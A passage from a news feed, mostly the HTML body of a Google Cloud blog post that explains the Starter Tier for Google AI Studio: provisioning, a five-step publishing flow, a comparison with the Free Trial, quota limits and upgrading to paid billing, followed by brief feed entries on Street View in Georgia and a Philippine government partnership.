&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;When you need relational data with proper schemas, joins, and ACID compliance, the Starter Tier provisions &lt;/span&gt;&lt;a href="https://cloud.google.com/sql/docs/postgres" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud SQL for PostgreSQL&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; Developer edition, designed to work seamlessly with AI Studio agent. The developer edition enables instant provisioning and scale to 0,  which enables fast and low cost developer experience. You also get the full power of open source PostgreSQL with capabilities like &lt;/span&gt;&lt;a href="https://cloud.google.com/discover/what-is-pgvector" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;pgvector&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, so you can build semantic search or RAG applications without bolting on a separate vector database.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;As you iterate on your application using prompts, Google AI Studio agent will automatically generate the required schema and migrate the schema, as you move through building and publishing your application.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;From prompt to live URL in five steps&lt;/h3&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Open Google AI Studio Build Mode.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Go to &lt;/span&gt;&lt;a href="https://ai.google.dev/aistudio" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google AI Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and switch to Build Mode. No payment method, no project setup.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Describe your app.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Type a prompt like "Build a shared to-do list app using Firebase as a backend." The agent generates a React frontend and a Node.js backend, with a live preview on the right side of the screen.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;3. Enable Firebase (if prompted).&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; If your prompt involves user data or authentication, the agent shows a configuration card to enable Firebase. Click the Settings icon to pick a region (this locks in the Cloud Run region too), then confirm.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;4. Click Publish &amp;gt; Get Started &amp;gt; Publish App.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The agent packages your code and provisions a Cloud Run service in your Starter Tier project.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;5. Grab your URL.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Within seconds, you'll have a live &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;.run.app&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; URL. You can monitor it from the simplified Google Cloud console view that shows logs and metrics for your deployed containers.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;That's it. No Dockerfile, no &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gcloud&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; CLI, no YAML configuration files.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;How the Starter Tier compares&lt;/h3&gt;
&lt;p&gt;Google Cloud offers several ways to explore for free. Below, we compare the Starter Tier to the Free Trial, the most common entry point for new users.&lt;/p&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1" style="border-collapse: collapse; width: 100%; height: 387.18px;"&gt;
&lt;tbody&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt; &lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;a href="https://docs.cloud.google.com/docs/starter-tier" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Starter Tier&lt;/strong&gt;&lt;/a&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;a href="https://docs.cloud.google.com/free/docs/free-cloud-features" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Free Trial&lt;/strong&gt;&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 230.391px;"&gt;
&lt;td style="width: 31.4886%; height: 230.391px;"&gt;&lt;span style="vertical-align: baseline;"&gt;What you get&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 230.391px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Pre-wired stack that includes four products, with limited quota:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Run&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Firestore&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud SQL&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Firebase Authentication&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 230.391px;"&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;$300 Welcome credit&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/free/docs/free-cloud-features#free-tier" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Free Tier&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Other product-specific free trials&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;90-day exploration with no risk of being billed.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;What we need from you&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A Google account &lt;br /&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Accept Starter Tier Terms of Service&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Accept Google Cloud Terms of Service&lt;br /&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;A form of payment for anti-fraud purposes&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Time limit&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;None&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;90 days&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Project control&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Google-managed&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Full control&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Console experience&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Simplified&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Full&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Best for&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Prototyping from AI Studio&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Evaluating the full Google Cloud platform&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;What happens when you are ready for more?&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Upgrade to a paid account by adding a payment method. If you’ve never had a billing account before, you will receive the $300 Welcome credit and access to the Free Tier.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You will then be billed for usage that the Free Tier and $300 credit cannot cover.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="width: 31.4886%; height: 22.3984px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Upgrade to a paid billing account to keep your existing project, remaining credits, and Free Tier and full platform access.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You will then be billed for usage that the Free Tier and any remaining credit cannot cover.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Starter Tier is best for AI Studio prototyping. Choose the Free Trial If you need &lt;/span&gt;&lt;a href="https://cloud.google.com/bigquery" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/kubernetes-engine" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GKE&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, or &lt;/span&gt;&lt;a href="https://cloud.google.com/products/gemini-enterprise-agent-platform" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, or the 90-day period to evaluate GCP broadly with no risk of being billed. Both paths allow you to seamlessly upgrade to a paid account for the full experience whenever you are ready.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;How to plan for limits&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Starter Tier is generous for prototyping, but it does have boundaries. Knowing them upfront saves you from unpleasant surprises.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Two-app cap.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You can deploy a maximum of two applications. Note that if you want to replace one of your active applications, you should deploy over or overwrite the existing app slot in Google AI Studio rather than attempting to delete the service manually in the Cloud Console.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Single region.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; All resources in your Starter Tier project are pinned to one region, chosen whenever the first Starter Tier service is provisioned. For example, if a Firestore database is provisioned before deploying to Cloud Run, then the region is chosen at that time.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Locked API surface.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You can't enable additional Google Cloud APIs (BigQuery, Pub/Sub, Cloud Functions, etc.) in a Starter Tier project. If you need them, you'll need to upgrade.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Ephemeral filesystem.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Because your published Google AI Studio app runs inside a serverless Cloud Run container, it inherits a temporary filesystem. Any files you write directly to disk (like uploaded images, generated PDFs, or local &lt;/span&gt;&lt;a href="https://www.sqlite.org" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;SQLite&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; databases) will vanish when the container scales to zero or gets redeployed. Since Google AI Studio redeploys your container with each prompt iteration, this happens frequently. Store persistent data in Firestore or Cloud SQL for PostgreSQL.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Firestore shared quota.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; All Firestore databases created by the Google AI Studio agent share a single shared-quota group. In Google Cloud, a quota represents a usage limit or daily budget to protect the project and prevent abuse. It is not a guarantee of reserved server capacity.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1" style="border-collapse: collapse; width: 100%; height: 134.39px;"&gt;
&lt;tbody&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Quota Metric&lt;/strong&gt;&lt;/td&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Starter Tier Maximum Limit&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Total Stored Data&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;1 GiB total&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Network Egress&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;10 GiB per month&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Write Operations&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;40,000 writes per day&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Read Operations&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;50,000 reads per day&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Real-Time Updates&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 48.1336%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;50,000 updates per day&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If any database in the group exhausts a daily limit, all databases in the group pause until roughly midnight Pacific Time. Firebase Authentication usage is metered separately, so a spike in logins won't eat into your database quota.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Cloud SQL share quota:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You are limited to building a maximum of 2 apps with Cloud SQL. AI Studio agent will automatically fallback to Firestore if the Cloud SQL quota is exceeded. You can get more quota by growing out of the sandbox.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Growing out of the sandbox&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The best part of the Starter Tier is how you upgrade from it. There's no migration, no data export, no DNS cutover. When you're ready to scale, you upgrade in place.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image2_O2DyF4k.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;From the &lt;/span&gt;&lt;a href="https://aistudio.google.com/projects" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Projects page in Google AI Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, click "Set up billing." You'll create a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/billing/docs/concepts" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Billing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; account, enter a payment method, and accept the standard Google Cloud Terms of Service. If you are a new Google Cloud customer, you will automatically receive the $300 Welcome credits, which will offset your usage costs during the trial period. The upgrade happens with zero downtime: your Cloud Run services keep running, your databases keep their data, and your &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;.run.app&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; URLs don't change.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;After upgrading, you get full IAM control, the ability to enable any Google Cloud API, and access to all regions and scaling options. The following cost safeguards are recommended:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Set a budget alert:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Go to the Google Cloud Billing console and set up a budget alert (e.g., at $10) to notify you if usage exceeds your expectations.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Set a Cloud Run max instance cap:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; In the Starter Tier, Google pins your maximum container instances to 1. Once you upgrade, configure an instance limit (e.g., &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;--max-instances 5&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) to prevent unexpected scaling charges from sudden traffic spikes.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Configure API quotas:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Set caps on API calls (such as the Gemini API or Firestore reads/writes) to enforce a hard ceiling on usage.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;One caveat: Firestore databases created by the Google AI Studio agent stay in the shared-quota group even after you add billing. If you want to get more usage quota for your database, then you need to go to the &lt;/span&gt;&lt;a href="https://console.firebase.google.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Firebase console&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, navigate to your Firestore database, and click "Upgrade database". This will remove the instance from the shared-quota group and put it on standard billing, although standard Firestore Free Tier limits still apply before you are charged.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The continuity across paths makes this process smooth. You can start with a prototype on the Starter Tier, iterate on it for weeks, and then flip it to a production-grade Google Cloud project when it's ready, without rebuilding anything.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Got questions about the Starter Tier or want to share with &lt;/span&gt;&lt;a href="https://x.com/kweinmeister" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;me&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; what you've built with it? You can also share your thoughts with the community on &lt;/span&gt;&lt;a href="https://www.reddit.com/r/googlecloud/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;r/GoogleCloud&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://www.reddit.com/r/Firebase/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;r/Firebase&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; subreddits.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/the-starter-tier-for-google-ai-studio-explained/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-22T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/maps/georgia-street-view/</id>
    <title>Street View opens a new window into Georgia</title>
    <updated>2026-06-22T06:00:00+00:00</updated>
    <content type="html">Street Car at Jvari Monastery</content>
    <link href="https://blog.google/products-and-platforms/products/maps/georgia-street-view/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-22T06:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://googlecloudpresscorner.com/2026-06-21-DICT-and-Google-Cloud-Partner-on-Multi-Year-AI-and-Cybersecurity-Initiatives-to-Deliver-Next-Generation-Citizen-Services</id>
    <title>DICT and Google Cloud Partner on Multi-Year AI and Cybersecurity Initiatives to Deliver Next-Generation Citizen Services</title>
    <updated>2026-06-22T03:00:00+00:00</updated>
    <content type="html">Strategic collaboration advances the Philippine Development Plan 2023–2028, while empowering public servants with agentic AI tools to boost productivity and national cyber defense</content>
